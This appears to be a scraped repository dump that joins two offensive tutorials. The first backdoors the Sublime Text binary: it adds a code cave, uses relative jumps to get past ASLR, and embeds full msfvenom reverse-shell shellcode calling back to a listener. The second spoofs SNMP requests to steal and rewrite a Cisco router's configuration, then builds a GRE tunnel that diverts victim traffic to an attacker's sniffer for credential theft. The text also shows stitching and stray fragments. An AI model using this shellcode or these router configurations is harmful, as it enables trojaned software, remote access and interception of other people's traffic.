Development – Vulnserver HTER – Hex conversionBypassing Kaspersky AntiVirus 2018 → 50 | Backdooring a Windows Binary bypassing ASLR memory protection 51 | Posted on July 30, 2019 by Xavi 52 | Hello, 53 | 54 | Today is a sunny day here in my country and I should be in the beach drinking a cold beer, but I don’t know why… I’m here at home embedding a backdoor inside a Windows binary. 55 | 56 | I’ve already wrote about this in the blog, but this time is going to be a bit more complex, in this post I will cover how to bypass the Windows ASLR protection. 57 | 58 | ASLR means Address Space Layour Randomization, and what it does is, that each time that the same program is executed, it will use another memory space with another memory addresses. 59 | 60 | From a exploit development perspective, what it means is that we can’t hard-code addresses anymore. Instead of that, we need to start using “relative addresses”. 61 | 62 | For this blog post, I’ve chosen my favorite GUI text editor that is Sublime Text. Let’s see the process of embedding a backdoor in it step by step. 63 | 64 | Step 1. Creating a new memory section 65 | We could find a suitable Code Cave without creating a new memory section, but I want to keep this tutorial as simple as I can. 66 | 67 | At the end of the blog post I will share with you some interesting links if you want to read a bit more about Code Caves and other interesting topics. 68 | 69 | As I said, to keep the things simple, I used LordPE to create a new section inside the binary. This memory section is going to be named “Evil”. 70 | 71 | 72 | I copy the address RawOffset, we are going to need it in the next step. 73 | 74 | I have to find the RawOffset address inside the hex editor: 75 | 76 | 0x0068E600 77 | And insert the 1000 bytes at that point: 78 | 79 | 80 | Step 2. Jumping to the code Cave 81 | Now it’s the moment to open the binary inside a debugger. 82 | 83 | These are the two first instructions of the program: 84 | 85 | 006AF62A > E8 05000000 CALL sublime_.006AF634 86 | 006AF62F ^E9 87FEFFFF JMP sublime_.006AF4BB 87 | We are going to overwrite the first instruction, this means that after, we are going to need to replicate that first CALL Sublime 006AF634. Done that, we are going to need to jump to the address where the second instruction is: 006AF62F. 88 | 89 | Notice that all these address are going to be changing during the binary modification process because of ASLR. 90 | 91 | Another address that ASLR is going to modify is our 1000 null bytes Code Cave location. We want to jump there but we can’t hard-code it. 92 | 93 | If we check the location of our Code Cave, for this current execution of the program we can see that is in this memory address: 94 | 95 | Code Cave - 0x013BA000 96 | And that our entry point for our program is the following: 97 | 98 | Entry Point of the Program - 0x011DF62A 99 | How we can do a relative jump? The answer is using Nasm. 100 | 101 | We are going to do a jump to the Code Cave – Entry Point. We can do it like this: 102 | 103 | root@kali:~# /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb 104 | nasm > JMP (0x013BA000-0x011DF62A) 105 | 00000000 E9D1A91D00 jmp 0x1da9d6 106 | 107 | So the correct opcodes are: 108 | 109 | "\xE9\xD1\xA9\x1D\x00" 110 | We do a binary copy to copy them into the debugger and save them. The Jump is going to work although the program has ASLR protection. Because is a “relative” jump. 111 | 112 | 113 | We take the jump with F7. And we will be located at the begging of our Code Cave. Here we need to save our current registers and flags status to recover them after. We need to do these instructions: 114 | 115 | pushad # Save registers into the stack 116 | pushfd # Save flags into the stack 117 | 118 | Step 3. Creating and modifying the shellcode 119 | After saving the current program status, we are ready to put here our shellcode. 120 | 121 | The most important thing here is to use exactly the same payload as I use, please notice the underscore symbol: 122 | 123 | windows/shell_reverse_tcp 124 | 125 | This is the full command: 126 | 127 | root@kali:~# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.88 LPORT=443 -f hex EXITFUNC=none 128 | [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload 129 | [-] No arch selected, selecting arch: x86 from the payload 130 | No encoder or badchars specified, outputting raw payload 131 | Payload size: 324 bytes 132 | Final size of hex file: 648 bytes 133 | fce8820000006089e531c0648b50308b520c8b52148b72280fb74a2631ffac3c617c022c20c1cf0d01c7e2f252578b52108b4a3c8b4c1178e34801d1518b592001d38b4918e33a498b348b01d631ffacc1cf0d01c738e075f6037df83b7d2475e4588b582401d3668b0c4b8b581c01d38b048b01d0894424245b5b61595a51ffe05f5f5a8b12eb8d5d6833320000687773325f54684c772607ffd5b89001000029c454506829806b00ffd5505050504050405068ea0fdfe0ffd5976a0568c0a8015868020001bb89e66a1056576899a57461ffd585c0740cff4e0875ec68f0b5a256ffd568636d640089e357575731f66a125956e2fd66c744243c01018d442410c60044545056565646564e565653566879cc3f86ffd589e04e5646ff306808871d60ffd5bbaac5e25d68a695bd9dffd53c067c0a80fbe07505bb4713726f6a0053ffd5 134 | We copy it into the debugger and save the changes. 135 | 136 | Now, we are going to have two problems. The first one is, that the program is going to hang until we close our shell, and the second one is that there is no listener, the program will close before starting. 137 | 138 | Solving problem 1 – WaitForSingleObject Infinite 139 | 140 | The shellcode is going to do the following: 141 | 142 | DEC ESI ; Current value is 0, so it will convert in -1 143 | PUSH ESI; 144 | INC ESI; 145 | We are pushing a -1 to the the stack, and this is the parameter that is going to hang the code execution until shell ends, we need to change it for a zero. So we just can change DEC ESI for a NOP. 146 | 147 | 148 | Solving problem 2 – Avoiding ExitProcess 149 | 150 | This fix is going to be a bit more complex. In the middle of the code we are going to see the following instructions: 151 | 152 | 74 0C je short Sublime 153 | FFF4E 08 dec dword ptr ds:[esi+8] 154 | 75 EC jnz short Sublime 155 | 68 F0B5A256 push 56A2B5F0 ---> THIS PUSH 156 | FFD5 call ebp # Process will finish if we reach this point 157 | 68 636D6400 push 646D63 158 | 159 | I recommend you to look for the following instruction to locate this part of the code: 160 | 161 | dec dword ptr ds:[esi+8] 162 | What we need to do here is remove that push, and change it for a Jump to the end of the shellcode. 163 | 164 | 165 | Step 4. Stack alignment 166 | 167 | But we are going to need two different stack adjustments, 168 | the first one is going to be for the case that the shell generated a connection, 169 | and the second one, for the case that it didn’t. 170 | 171 | As you can see in the image below, when the shellcode ends, we have a Nop padding, 172 | and we will align the stack adding 1DC, then we will jump over the other stack alignment 173 | and we will reach our register recovery part of the code. 174 | For the other case, when the code is not going to find a listener, 175 | the jump that we created before, is going to land in the ADD ESP, 1A4 instruction 176 | and then we will reach the registers recovery part. 177 | 178 | 179 | Stack alignment case 1 – shell works: 180 | 181 | For the case, where the shell works: 182 | 183 | ESP where we saved the registers and flags: 001DFA8C 184 | ESP after the shell execution: 001DFC68 185 | We need to add 1DC. 186 | 187 | 188 | Stack alignment case 2 – shell timeout: 189 | 190 | Second fix: 191 | 192 | ESP where we saved the registers and flags: 0091FBF4 193 | ESP in the PUSH that goes to exitprocess: 0091FA50 194 | We need to add 1A4. 195 | 196 | 197 | Step 5. Recover the execution flow 198 | If you remember, the first step of all this process was to save the first two lines of the Sublime program execution. 199 | 200 | 201 | We need to reproduce that CALL, and after jump to the second memory address. 202 | But ASLR doesn’t let us to use absolute memory addresses. 203 | 204 | 1 – CALL Sublime recovery 205 | 206 | Look here: https://xavibel.com/2019/07/30/backdooring-a-windows-binary-bypassing-aslr-memory-protection/ 207 | 208 | 2 – Jumping to the second memory address 209 | 210 | 211 | This one is a bit more simpler, we only need to know where we want to jump, and where we are right now. 212 | 213 | Second memory address - 0076F62F 214 | Current Memory Address - 0094A185 215 | The operation that we need is: 216 | 217 | JMP (Second Memory Address - Current Memory Address) 218 | And again using Nasm we find the opcodes: 219 | 220 | nasm > JMP (0x0076F62F-0x0094A185) 221 | 00000000 E9A554E2FF jmp 0xffe254aa 222 | 223 | -------------------------------------------------------------------------------- /Exploiting-Cisco-Routers/SNMP-ConfigurationAttack-With-A-GRE-Tunnel: -------------------------------------------------------------------------------- 1 | "How would the attacker know about the access list / SNMP RW community name in the first place?" 2 | 3 | This could be done with a simple brute force attack, 4 | not only with SNMP community names, but also with source IP addresses, and such a tool already exists. 5 | 6 | 7 | Source: https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=50318646-6402-48f0-82db-25d00ac3d76c&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments 8 | 9 | As discussed in "Exploiting Cisco Routers, Part 1" it is possible to get a Cisco router to pull/send 10 | its configuration file with TFTP, using an SNMP SET command. 11 | 12 | By sending an SNMP set request with a spoofed source IP address 13 | (from the RFC1918 range-192.168.1.0), 14 | we should be able to get the Victim router to send us its configuration file. 15 | This is assuming we know the private community string, as well as the ACLs implemented on the SNMP RW community string. 16 | 17 | ----------------- 18 | ----------------- 19 | ----------------- 20 | Bypassing the SNMP access list 21 | 22 | Lets start by creating our forged SNMP request. 23 | Using a nifty little Perl script and Ethereal, 24 | we capture a standard "copy config" SNMP SET request, which we can use as a baseline packet. 25 | 26 | 27 | Once executed, the following SNMP packet is captured and shown below in Figure 2.. 28 | As expected, this request is declined by the router, and no configuration file is sent. 29 | 30 | Notice the attacker's source IP address (80.179.76.227). 31 | Now, Using a hex editor, we change the source IP address, and fix the packet headers. 32 | C0 A8 01 05 (in hex) represents our spoofed source IP address, 192.168.1.5, as shown below in Figure 3. 33 | 34 | We then send the packet using file2cable (or any packet generator) 35 | 36 | Soon after, our TFTP server gets a connection. 37 | 38 | Notice the source IP for the SNMP request, and the TFTP write Request (packets 1 and 2). 39 | The packet bypasses the SNMP access list, and we get the Victim router configuration file by TFTP. 40 | 41 | ----------------- 42 | ----------------- 43 | ----------------- 44 | The GRE tunnel 45 | 46 | Generic Routing Encapsulation (GRE) is a tunneling protocol designed for encapsulation of arbitrary 47 | kinds of network layer packets inside arbitrary kinds of network layer packets. 48 | One common use for GRE is to connect IPX network segments over an IP only backbone. 49 | In this case you would create a GRE tunnel from one router to the next to transport the IPX packets 50 | back and forth over the IP backbone. 51 | 52 | For our purposes, however, we need a twist on the standard usage of GRE tunneling. The plan is to do the following: 53 | 54 | - Create the GRE tunnel from the Victim border router to the attacker router. 55 | - Specify which traffic will be sent through the tunnel. 56 | - Have the attacker router decapsulate the GRE packets and forward them to the attacking (sniffer) computer for analysis. 57 | 58 | 59 | ----------------- 60 | ----------------- 61 | ----------------- 62 | The Victim router 63 | 64 | We need to create the GRE tunnel on the victim router. 65 | Since we don't have console / terminal access to this router, 66 | we can simply edit the downloaded configuration file, and once it's ready, 67 | merge it back to the router using a spoofed SNMP SET request. 68 | 69 | We add the following lines to the victim router configuration file: 70 | 71 | interface tunnel0 ip address 192.168.10.1 255.255.255.0 tunnel source Ethernet0/0 tunnel 72 | destination tunnel mode gre ip 73 | 74 | What this is means is that: 75 | 76 | - We create the tunnel0 interface and specify an IP address from the 192.168.10.x network. 77 | Both sides of the tunnel need to be in the same network in order for them to communicate. 78 | - We specify the Ethernet0/0 interface as the tunnel source (otherwise where would the tunnel start from?). 79 | - The tunnel destination is the IP of the attacker's border router external interface. 80 | - The final command is optional since the tunnel will default to GRE (we type it in just to make sure). 81 | 82 | We can now configure access-lists to specify which traffic is to be forwarded, 83 | and route-maps to actually perform the packet forwarding. 84 | 85 | We add the following lines to the victim router configuration file: 86 | 87 | access-list 101 permit tcp any any eq 443 access-list 101 permit tcp any any eq 80 access-list 101 permit tcp any any eq 21 access-list 101 permit tcp any any eq 20 access-list 101 permit tcp any any eq 23 access-list 101 permit tcp any any eq 25 access-list 101 permit tcp any any eq 110 88 | 89 | This means that this access-list will match SSL, http, ftp-control / data, telnet, smtp, and pop3 data. 90 | 91 | Now that the traffic has been matched it must be redirected using route-maps. 92 | 93 | We add the following lines to the Victim router configuration file: 94 | router-map divert-traffic match ip address 101 set ip next-hop 192.168.10.2 interface Ethernet0/0 ip policy route-map divert-traffic 95 | 96 | Which means: 97 | - We specify a name for the route map (divert-traffic) and then use the match command to use access-list 101 98 | as the match condition. 99 | - We specify the GRE tunnel IP address of the Attacker as the next hop IP. 100 | - We apply the route-map on the victim's internal LAN interface. This will cause it to evaluate all traffic coming in and out of the Ethernet0/0. 101 | 102 | ----------------- 103 | ----------------- 104 | ----------------- 105 | The Attacking router 106 | 107 | The configuration to be used on the attacking router is a bit more elaborate since we need to specify 108 | two route-maps 109 | - one to send traffic to attacker (sniffer) 110 | - second to send traffic back to the Victim router for normal forwarding. 111 | 112 | It is crucial that we forward the tunneled data back to the Victim router so the client victim does not lose connectivity. 113 | 114 | We start by creating the GRE tunnel on the attacker's router: 115 | Attacker(config)# interface tunnel0 Attacker(config-if)# ip address 192.168.10.2 255.255.255.0 Attacker(config-if)# tunnel source Ethernet0/0 Attacker(config-if)# tunnel destination Attacker(config-if)# tunnel mode gre ip Attacker(config)# access-list 101 permit ip any any Attacker(config)# router-map divert-to-sniffer Attacker(config-route-map)# match ip address 101 Attacker(config-route-map)# set ip next-hop 192.168.3.5 Attacker(config-route-map)# exit Attacker(config)# interface tunnel0 Attacker(config-if)# ip policy route-map divert-to-sniffer 116 | 117 | Which means: 118 | - We create an access list to match all traffic. 119 | - We create the route-map and give it the name divert-to-sniffer 120 | (this route-map will forward tunneled data to the sniffer). 121 | - The access-list is used as a match condition. 122 | - We specify the attacker's (sniffer) IP as the next hop. 123 | - We apply the route-map to the tunnel interface. 124 | 125 | It is very important we use a route-map to forward the data. The router receives the tunneled data in GRE encapsulation, 126 | which we can't view without decoding the packets. By redirecting received packets out onto the attacker (sniffer), 127 | The router will forward the packets as standard IP packets without the GRE encapsulation. 128 | 129 | Attacker(config-if)# route-map divert-out Attacker(config-route-map)# match ip address 101 Attacker(config-route-map)# set ip next-hop 192.168.10.1 Attacker(config-route-map)# exit Attacker(config)# interface ethernet0/0 Attacker(config-if)# ip policy route-map divert-out 130 | 131 | This additional configuration means: 132 | - The divert-out route-map will forward the tunneled data back to the Victim router after the attacker (sniffer) has captured and forwarded it back out. 133 | - We apply the route-map to the Ethernet interface. 134 | 135 | 136 | ----------------- 137 | ----------------- 138 | ----------------- 139 | The Attacker (Sniffer) 140 | 141 | After completing all necessary router configurations 142 | we need to configure the attacker's computer (the sniffer) to capture and forward data correctly. 143 | The computer must be configured with an IP address and a gateway. 144 | It is vital that the computer be configured to forward packets back out using either one of the following commands: 145 | 146 | root@whax:~# echo 1 > /proc/sys/net/ipv4/ip_forward -or- root@whax:~# fragrouter -B1 147 | 148 | Without the forwarding, the Victim client will be DoS'ed, rendering this attack useless. 149 | 150 | ----------------- 151 | ----------------- 152 | ----------------- 153 | Initiating the attack 154 | 155 | Once everything is configured, all that's left to do is to upload the new, 156 | modified victim router configuration file. 157 | 158 | This will effectively activate the GRE tunnel and redirect all traffic from the victim client's LAN, to the attacker (sniffer). 159 | 160 | We create a spoofed SNMP SET request which kindly asks the router to get its new configuration file from our TFTP server, 161 | and merge it with its current configuration. Again, we use a non-spoofed request as our packet baseline: 162 | 163 | We capture this packet, and modify its source IP address and packet headers as shown in Figure 5. 164 | 165 | Once sent, we see that a TFTP connection is made to our attacking computer in Figure 6. 166 | 167 | Notice the TFTP Read Request (packet 2). 168 | Once again, the packet bypasses the SNMP access list and pulls/merges the modified configuration file by TFTP. 169 | The Victim router debug information gives some interesting insight into the attack: 170 | Notice that the TFTP server address is a separate parameter from the attacker's source IP address 171 | (as opposed to most TCP based traffic). 172 | The tunnel is now open and operational, and effectively resembles the diagram below in Figure 7. 173 | 174 | 175 | We can verify the operation of the tunnel by issuing a debug command on the attacker's router: 176 | Attacker# debug tunnel *Mar 3 06:38: Tunnel0: GRE/IP to classify 212.199.145.242 ->80.179.20.55 (len=108 type=0x800 ttl=253 tos=0x0) *Mar 3 06:38: Tunnel0: adjacency fixup, 80.179.20.55 -> 212.199.145.242, tos=0x0 *Mar 3 06:38: Tunnel0: GRE/IP to classify 212.199.145.242 ->80.179.20.55 (len=108 type=0x800 ttl=253 tos=0x0) *Mar 3 06:38: Tunnel0: adjacency fixup, 80.179.20.55 -> 212.199.145.242, tos=0x0g all 177 | 178 | Suppose the Victim client searches Google for the term "GRE Sniffing," in Figure 8. 179 | 180 | When this happens, the following appears in the ethereal capture on the attacker's computer (the sniffer) 181 | 182 | Apart from using a customized sniffer (such as dsniff) to capture clear-text passwords, 183 | we can now implement sophisticated man-in-the-middle attacks against our victim client. 184 | 185 | Ettercap is a great tool of choice as it will perform a man-in-the-middle attack against both the SSL and 186 | SSH encrypted protocols in addition to harvesting other types of passwords. 187 | Traffic can also be manipulated and changed using Ettercap filters. The possibilities are virtually endless. 188 | 189 | 190 | 191 | 192 | 193 | 194 | 195 | 196 | 197 | 198 | 199 | 200 | --------------------------------------------------------------------------------